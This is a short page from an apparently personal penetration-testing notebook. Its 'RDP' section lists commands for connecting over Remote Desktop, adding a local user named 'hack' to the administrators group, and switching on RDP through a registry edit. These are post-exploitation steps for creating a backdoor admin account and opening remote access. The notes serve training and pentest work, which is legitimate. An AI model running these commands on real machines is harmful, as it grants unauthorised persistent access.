[email protected]
Search
⌃K
[email protected]
Search
⌃K
About Calvin Lai (fkclai)
My Work
Exploit/CVE PoC
ZeroLogon Exploit
Remote Retrieved Chrome saved Encrypted Password
Twitter Control an RCE attack
Hacking Report (HTB)
Hits & Summary
Windows Machine
Linux Machine
Secure Coding Principles
Penetration Testing Checklists
Web Application PenTest
Network/System PenTest
Mobile Application PenTest
Red Team (Windows)
01 Reconnaissance
02 Privileges Escalation
03 Lateral Movement
04 AD Attacks
05 Bypass-Evasion
06 Kerberos Attack
99 Basic Command
Exploitation Guide
01 Reconnaissance
02 Port Enumeration
03 Web Enumeration
04 Windows Enum & Exploit
Windows Credential Dumping
Kerberos Attack
RDP
05 File Enumeration
06 Reverse Shell Cheat Sheet
07 SQL Injection
08 BruteForce
09 XSS Bypass Checklist
10 Spring Boot
11 WPA
12 Payload list
Vuln Hub (Writeup)
MrRobot
CYBERRY
MATRIX 1
Node-1
DPwwn-1
DC7
AiWeb-2
AiWeb-1
BrainPan
CTF (Writeup & Tips)
CTF Tools & Tips
Hacker One
CTF Learn
P.W.N. University - CTF 2018
HITCON
Pwnable
Useful Command/Tools
Kali
Windows
Linux
Offensive Security Lab & Exam
Lab
Tools for an Offensive Certification
Powered By GitBook

RDP

xfreerdp /d:<domain> /u:<user> /v:<target machine ip> +clipboard
rdesktop 10.11.0.22 -u hack -p pass123 -g 1024x768 -x 0x80
net user hack pass123 /add && net localgroup administrators hack /add
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
Previous
Kerberos Attack
Next - Exploitation Guide
05 File Enumeration
Last modified 2yr ago
Copy link